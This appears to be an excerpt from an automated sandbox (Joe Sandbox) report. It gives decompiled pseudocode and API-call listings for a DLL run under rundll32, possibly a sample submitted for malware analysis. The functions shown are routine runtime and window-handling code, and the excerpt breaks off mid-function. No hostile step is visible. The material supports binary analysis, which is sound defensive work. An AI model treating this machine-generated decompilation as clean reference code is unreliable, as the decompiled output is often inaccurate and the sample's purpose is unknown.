                                                                        							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
                                                                        							if( *( *(_t121 + 0x3ac)) != 0x1a) {
                                                                        								goto L28;
                                                                        							}
                                                                        							_t77 = 0;
                                                                        							goto L31;
                                                                        						} else {
                                                                        							goto L6;
                                                                        						}
                                                                        						do {
                                                                        							L6:
                                                                        							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
                                                                        							__eflags = _t107;
                                                                        							_t86 = _t121 - 0x68;
                                                                        							 *(_t121 - 0x70) = _t112;
                                                                        							do {
                                                                        								__eflags = _t107 -  *(_t121 + 0x3b0);
                                                                        								if(_t107 >=  *(_t121 + 0x3b0)) {
                                                                        									break;
                                                                        								}
                                                                        								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
                                                                        								_t110 =  *( *(_t121 - 0x74));
                                                                        								_t107 = _t107 + 1;
                                                                        								__eflags = _t110 - 0xa;
                                                                        								if(_t110 == 0xa) {
                                                                        									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
                                                                        									 *_t86 = 0xd;
                                                                        									_t86 = _t86 + 1;
                                                                        									_t34 = _t121 - 0x70;
                                                                        									 *_t34 =  &( *(_t121 - 0x70)->Internal);
                                                                        									__eflags =  *_t34;
                                                                        								}
                                                                        								 *_t86 = _t110;
                                                                        								_t86 = _t86 + 1;
                                                                        								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                        								__eflags =  *(_t121 - 0x70) - 0x400;
                                                                        							} while ( *(_t121 - 0x70) < 0x400);
                                                                        							_t115 = _t86 - _t121 - 0x68;
                                                                        							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
                                                                        							__eflags = _t91;
                                                                        							if(_t91 == 0) {
                                                                        								 *(_t121 - 0x6c) = GetLastError();
                                                                        								L16:
                                                                        								_t112 = 0;
                                                                        								__eflags = 0;
                                                                        								L17:
                                                                        								_t76 =  *(_t121 - 0x78);
                                                                        								__eflags = _t76 - _t112;
                                                                        								if(_t76 != _t112) {
                                                                        									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                        									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                        									goto L31;
                                                                        								}
                                                                        								__eflags =  *(_t121 - 0x6c) - _t112;
                                                                        								if( *(_t121 - 0x6c) == _t112) {
                                                                        									goto L25;
                                                                        								}
                                                                        								_t120 = 5;
                                                                        								__eflags =  *(_t121 - 0x6c) - _t120;
                                                                        								if( *(_t121 - 0x6c) != _t120) {
                                                                        									_t81 = E10013707( *(_t121 - 0x6c));
                                                                        								} else {
                                                                        									 *((intOrPtr*)(E100136F5())) = 9;
                                                                        									_t81 = E100136FE();
                                                                        									 *_t81 = _t120;
                                                                        								}
                                                                        								goto L29;
                                                                        							}
                                                                        							_t93 =  *(_t121 - 0x80);
                                                                        							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
                                                                        							__eflags = _t93 - _t115;
                                                                        							if(_t93 < _t115) {
                                                                        								goto L16;
                                                                        							}
                                                                        							_t112 = 0;
                                                                        							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
                                                                        						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
                                                                        					}
                                                                        					goto L17;
                                                                        				} else {
                                                                        					_t77 = 0;
                                                                        					L32:
                                                                        					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                        • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				struct tagRECT _v28;
                                                                        				struct tagRECT _v44;
                                                                        				struct tagRECT _v60;
                                                                        				void* _t76;
                                                                        				int _t78;
                                                                        				intOrPtr _t83;
                                                                        				intOrPtr _t102;
                                                                        				int _t116;
                                                                        				void* _t124;
                                                                        				void* _t128;
                                                                        				intOrPtr _t133;
                                                                        				void* _t135;
                                                                        				void* _t139;
                                                                        
                                                                        				_t135 = __edi;
                                                                        				_t124 = __ecx;
                                                                        				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                        				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                        				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                        				_t139 = 2;
                                                                        				if(_t133 == 0xa) {
                                                                        					L7:
                                                                        					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
                                                                        					L9:
                                                                        					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
                                                                        					__eflags = _t78;
                                                                        					L10:
                                                                        					if(_t78 < 0) {
                                                                        						_t78 = 0;
                                                                        					}
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
                                                                        					GetWindowRect(GetDesktopWindow(),  &_v44);
                                                                        					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					if(_t83 == 0xa || _t83 == 0xc) {
                                                                        						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
                                                                        						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
                                                                        						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                        						if(__eflags != 0) {
                                                                        							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
                                                                        							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
                                                                        							__eflags = _t102;
                                                                        							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
                                                                        							 *(_t124 + 0x48) = _v28.left;
                                                                        							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
                                                                        						}
                                                                        					} else {
                                                                        						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
                                                                        						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
                                                                        						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                        						_t149 = _t116;
                                                                        						if(_t116 != 0) {
                                                                        							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
                                                                        							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
                                                                        							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
                                                                        							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)(_t124 + 4)) = _a4;
                                                                        					 *((intOrPtr*)(_t124 + 8)) = _a8;
                                                                        					return E10030582(_t124, _t149, 0);
                                                                        				}
                                                                        				if(_t133 == 0xb) {
                                                                        					__eflags = _t133 - 0xa;
                                                                        					if(_t133 != 0xa) {
                                                                        						_t14 = __ecx + 0x30;
                                                                        						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
                                                                        						__eflags =  *_t14;
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				} else {
                                                                        					_t139 = 0x22;
                                                                        					if(_t133 != 0xc) {
                                                                        						_t8 = __ecx + 0x34;
                                                                        						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
                                                                        						__eflags =  *_t8;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
                                                                        					}
                                                                        					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
                                                                        					goto L10;
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$IntersectWindow$Desktop
                                                                        • String ID:
                                                                        • API String ID: 123605412-0
                                                                        • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
                                                                        • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
                                                                        				intOrPtr _v8;
                                                                        				short _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				void** _v84;
                                                                        				signed int _v88;
                                                                        				intOrPtr _t52;
                                                                        				short* _t65;
                                                                        				void* _t74;
                                                                        				short* _t81;
                                                                        				void* _t86;
                                                                        				char* _t92;
                                                                        				signed int _t93;
                                                                        				signed int* _t95;
                                                                        				void** _t96;
                                                                        				signed int _t101;
                                                                        				signed int _t103;
                                                                        				void* _t106;
                                                                        
                                                                        				_t52 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t52;
                                                                        				_v84 = __ecx;
                                                                        				if(__ecx[1] != 0) {
                                                                        					_t95 = GlobalLock( *__ecx);
                                                                        					_v80 = 0 | _t95[0] == 0x0000ffff;
                                                                        					_v76 = E100246AB(_t95);
                                                                        					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
                                                                        					_v88 = _t101;
                                                                        					if(_v80 == 0) {
                                                                        						 *_t95 =  *_t95 | 0x00000040;
                                                                        					} else {
                                                                        						_t95[3] = _t95[3] | 0x00000040;
                                                                        					}
                                                                        					if(lstrlenA(_a4) < 0x20) {
                                                                        						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
                                                                        						_t65 = E1002472A(_t95);
                                                                        						_t86 = 0;
                                                                        						_t81 = _t65;
                                                                        						if(_v76 != 0) {
                                                                        							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
                                                                        						}
                                                                        						_t92 = _a4;
                                                                        						_t31 = _t81 + 3; // 0x3
                                                                        						_t33 = _t92 + 3; // 0x3
                                                                        						_t67 = _t86 + _t31 & 0xfffffffc;
                                                                        						_t103 = _t81 + _t33 & 0xfffffffc;
                                                                        						_v76 = _t86 + _t31 & 0xfffffffc;
                                                                        						if(_v80 == 0) {
                                                                        							_t93 = _t95[2];
                                                                        						} else {
                                                                        							_t93 = _t95[4];
                                                                        						}
                                                                        						if(_a4 != _t86 && _t93 > 0) {
                                                                        							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
                                                                        							_t106 = _t106 + 0xc;
                                                                        						}
                                                                        						 *_t81 = _a8;
                                                                        						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
                                                                        						_t96 = _v84;
                                                                        						_t96[1] = _t96[1] + _t103 - _v76;
                                                                        						GlobalUnlock( *_t96);
                                                                        						_t96[2] = _t96[2] & 0x00000000;
                                                                        						_t74 = 1;
                                                                        					} else {
                                                                        						_t74 = 0;
                                                                        					}
                                                                        				} else {
                                                                        					_t74 = 0;
                                                                        				}
                                                                        				return E100117AE(_t74, _v8);
                                                                        			}






















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalLocklstrlen
                                                                        • String ID:
                                                                        • API String ID: 1144527523-0
                                                                        • Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                        • Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
                                                                        • Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                        • Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
                                                                        				void* _v8;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long* _t9;
                                                                        				long* _t11;
                                                                        				long _t17;
                                                                        				signed int _t25;
                                                                        				long* _t33;
                                                                        				long* _t36;
                                                                        				long* _t38;
                                                                        				long* _t39;
                                                                        				long _t47;
                                                                        				long _t50;
                                                                        				void* _t52;
                                                                        				long* _t53;
                                                                        				struct _OSVERSIONINFOA* _t54;
                                                                        				signed int _t56;
                                                                        				struct _OSVERSIONINFOA* _t58;
                                                                        
                                                                        				_t9 = _a8;
                                                                        				if(_t9 != 1) {
                                                                        					__eflags = _t9;
                                                                        					if(_t9 != 0) {
                                                                        						__eflags = _t9 - 2;
                                                                        						if(__eflags != 0) {
                                                                        							__eflags = _t9 - 3;
                                                                        							if(_t9 == 3) {
                                                                        								E10015355(0);
                                                                        							}
                                                                        							L27:
                                                                        							_t11 = 1;
                                                                        							__eflags = 1;
                                                                        							L28:
                                                                        							return _t11;
                                                                        						}
                                                                        						_push(0x8c);
                                                                        						_push(1);
                                                                        						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
                                                                        						__eflags = _t53;
                                                                        						if(_t53 == 0) {
                                                                        							L24:
                                                                        							_t11 = 0;
                                                                        							goto L28;
                                                                        						}
                                                                        						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
                                                                        						_push(_t53);
                                                                        						if(__eflags == 0) {
                                                                        							E100107C8(__ebx, __edi, _t53, __eflags);
                                                                        							goto L24;
                                                                        						}
                                                                        						E1001518A();
                                                                        						_t17 = GetCurrentThreadId();
                                                                        						_t53[1] = _t53[1] | 0xffffffff;
                                                                        						 *_t53 = _t17;
                                                                        						goto L27;
                                                                        					}
                                                                        					__eflags =  *0x1004f3c8 - _t9; // 0x0
                                                                        					if(__eflags <= 0) {
                                                                        						goto L24;
                                                                        					}
                                                                        					 *0x1004f3c8 =  *0x1004f3c8 - 1;
                                                                        					__eflags =  *0x1004f41c - _t9; // 0x1
                                                                        					if(__eflags == 0) {
                                                                        						E10011F67();
                                                                        					}
                                                                        					E1001634A();
                                                                        					E1001516D();
                                                                        					E10013AD4();
                                                                        					goto L27;
                                                                        				}
                                                                        				E10010B20(0x94, __ecx);
                                                                        				_t54 = _t58;
                                                                        				_t54->dwOSVersionInfoSize = 0x94;
                                                                        				if(GetVersionExA(_t54) == 0) {
                                                                        					goto L24;
                                                                        				}
                                                                        				_t47 = _t54->dwPlatformId;
                                                                        				 *0x1004f3e0 = _t47;
                                                                        				_t25 = _t54->dwMajorVersion;
                                                                        				 *0x1004f3ec = _t25;
                                                                        				_t50 = _t54->dwMinorVersion;
                                                                        				 *0x1004f3f0 = _t50;
                                                                        				_t56 = _t54->dwBuildNumber & 0x00007fff;
                                                                        				 *0x1004f3e4 = _t56;
                                                                        				if(_t47 != 2) {
                                                                        					 *0x1004f3e4 = _t56 | 0x00008000;
                                                                        				}
                                                                        				 *0x1004f3e8 = (_t25 << 8) + _t50;
                                                                        				if(E10013A83(1) != 0) {
                                                                        					if(E10015384() != 0) {
                                                                        						E1001678D(__eflags);
                                                                        						 *0x10050cb0 = GetCommandLineA();
                                                                        						 *0x1004f3cc = E1001666B();
                                                                        						_t33 = E1001614C();
                                                                        						__eflags = _t33;
                                                                        						if(_t33 < 0) {
                                                                        							L13:
                                                                        							E1001516D();
                                                                        							goto L6;
                                                                        						}
                                                                        						_t36 = E100165C9();
                                                                        						__eflags = _t36;
                                                                        						if(_t36 < 0) {
                                                                        							L12:
                                                                        							E1001634A();
                                                                        							goto L13;
                                                                        						}
                                                                        						_t38 = E10016396();
                                                                        						__eflags = _t38;
                                                                        						if(_t38 < 0) {
                                                                        							goto L12;
                                                                        						}
                                                                        						_t39 = E10011E29(0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L12;
                                                                        						}
                                                                        						 *0x1004f3c8 =  *0x1004f3c8 + 1;
                                                                        						goto L27;
                                                                        					}
                                                                        					L6:
                                                                        					E10013AD4();
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                        • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                          • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                        • String ID:
                                                                        • API String ID: 770256606-0
                                                                        • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                        • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				struct tagRECT _v40;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed char _t60;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t67;
                                                                        				signed int _t73;
                                                                        				void* _t76;
                                                                        				intOrPtr _t83;
                                                                        				void* _t91;
                                                                        
                                                                        				_t91 = __eflags;
                                                                        				_t76 = __ecx;
                                                                        				_v24 = 1;
                                                                        				_v20 = 1;
                                                                        				_push(GetStockObject(0));
                                                                        				_t83 = E1002934F();
                                                                        				_v16 = _t83;
                                                                        				_v8 = E10033F2F(_t83, _t91);
                                                                        				_t60 =  *(_t76 + 0x74);
                                                                        				_v12 = _t83;
                                                                        				if((0x0000a000 & _t60) == 0) {
                                                                        					__eflags = _t60 & 0x00000050;
                                                                        					if(__eflags == 0) {
                                                                        						_v24 = GetSystemMetrics(0x20) - 1;
                                                                        						_v20 = GetSystemMetrics(0x21) - 1;
                                                                        						_t65 =  *(_t76 + 0x78);
                                                                        						__eflags = 0x0000a000 & _t65;
                                                                        						if((0x0000a000 & _t65) == 0) {
                                                                        							L6:
                                                                        							__eflags = _t65 & 0x00000050;
                                                                        							if(__eflags == 0) {
                                                                        								L9:
                                                                        							} else {
                                                                        								__eflags =  *(_t76 + 0x7c);
                                                                        								if(__eflags == 0) {
                                                                        									goto L9;
                                                                        								} else {
                                                                        									goto L8;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags =  *(_t76 + 0x7c);
                                                                        							if(__eflags != 0) {
                                                                        								goto L6;
                                                                        							}
                                                                        						}
                                                                        						_v12 = _v8;
                                                                        					} else {
                                                                        					}
                                                                        				} else {
                                                                        				}
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				if(_a4 != 0) {
                                                                        					_v20 = 0;
                                                                        					_v24 = 0;
                                                                        				}
                                                                        				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
                                                                        					InflateRect( &_v40, 0xffffffff, 0xffffffff);
                                                                        				}
                                                                        				_t95 =  *(_t76 + 0x24);
                                                                        				_t67 = _v8;
                                                                        				if( *(_t76 + 0x24) == 0) {
                                                                        					_t67 = _v16;
                                                                        				}
                                                                        				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
                                                                        				asm("movsd");
                                                                        				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
                                                                        				asm("movsd");
                                                                        				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
                                                                        				asm("movsd");
                                                                        				_t73 = 0 | _v12 == _v8;
                                                                        				asm("movsd");
                                                                        				 *(_t76 + 0x24) = _t73;
                                                                        				return _t73;
                                                                        			}



















                                                                        APIs
                                                                        • GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                        • String ID:
                                                                        • API String ID: 3923860780-0
                                                                        • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                        • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E1002084F(void* __ecx, struct HWND__** _a4) {
                                                                        				struct HWND__** _v8;
                                                                        				struct HWND__** _v12;
                                                                        				long _t31;
                                                                        				struct HWND__** _t32;
                                                                        				struct HWND__** _t44;
                                                                        				struct HWND__** _t45;
                                                                        				long _t47;
                                                                        				void* _t49;
                                                                        				struct HWND__** _t63;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t49 = __ecx;
                                                                        				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
                                                                        					_t31 = _a4;
                                                                        					if(_t31 != 0) {
                                                                        						if( *((intOrPtr*)(_t31 + 8)) == 0) {
                                                                        							L4:
                                                                        							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
                                                                        							_v12 = _t32;
                                                                        							_a4 = _t32;
                                                                        							E10006D96( &_a4);
                                                                        							while(_a4 != 0) {
                                                                        								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                        								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
                                                                        								if((E1002049B(_t37) & 0x00020000) != 0) {
                                                                        									break;
                                                                        								} else {
                                                                        									_t45 = _v8;
                                                                        									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
                                                                        										continue;
                                                                        									} else {
                                                                        										L16:
                                                                        										_t44 = _v8;
                                                                        										goto L17;
                                                                        									}
                                                                        								}
                                                                        								goto L18;
                                                                        							}
                                                                        							_a4 = _v12;
                                                                        							_t31 = E10006DAF( &_a4);
                                                                        							while(_a4 != 0) {
                                                                        								_t63 =  *(E10006DAF( &_a4));
                                                                        								_v8 = _t63;
                                                                        								if(_t63[2] == 0) {
                                                                        									L13:
